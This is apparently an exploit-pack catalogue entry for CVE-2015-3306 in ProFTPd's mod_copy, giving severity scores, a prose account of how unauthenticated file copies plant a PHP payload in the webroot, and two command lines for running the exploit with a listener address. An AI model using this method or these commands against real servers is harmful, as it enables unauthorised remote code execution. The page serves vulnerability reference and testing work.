10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.973 High
EPSS
Percentile
99.8%
Name | proftpd_mod_copy |
---|---|
CVE | CVE-2015-3306 Exploit Pack |
VENDOR: | |
NOTES: |
This exploit abuses the commands of the mod_copy module in ProFTPd (version<=1.3.5). The SITE CPFR/CPTO commands can be used by unauthenticated clients to copy files from any part of the filesistem to a chosen destination. With these commands the mod_copy module allows remote attackers to read and write local files.
In the first part of the attack, the exploit copy the /proc/self/cmdline to /tmp/ folder with a PHP payload as the filename, then copy this file to the webroot as a PHP file.
The second part of the attack involves making a GET request to the PHP file just created with the PHP shellcode as a parameter. The payload created in the first part will execute the PHP
shellcode
Note about the target:
To exploit this vulnerability, the mod_copy module must be compiled with the ProFTPd’s sources.Also we need write privs on the webroot folder we choose (unless the ftp server was started has root).
Then we must assume that the webserver has a PHP module.
This exploit has been tested on:
Command line usage:
$ ./commandlineInterface.py -l 172.16.135.238 -p5556 -v 7
$ python ./exploits/remote/unix/proftpd_mod_copy/proftpd_mod_copy.py -t 172.16.135.238 -l 172.16.135.1 -d 5556
Repeatability: Infinite
References: http://bugs.proftpd.org/show_bug.cgi?id=4169
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306
CERT Advisory: None
Date Public: 05/18/2015
CVSS: 10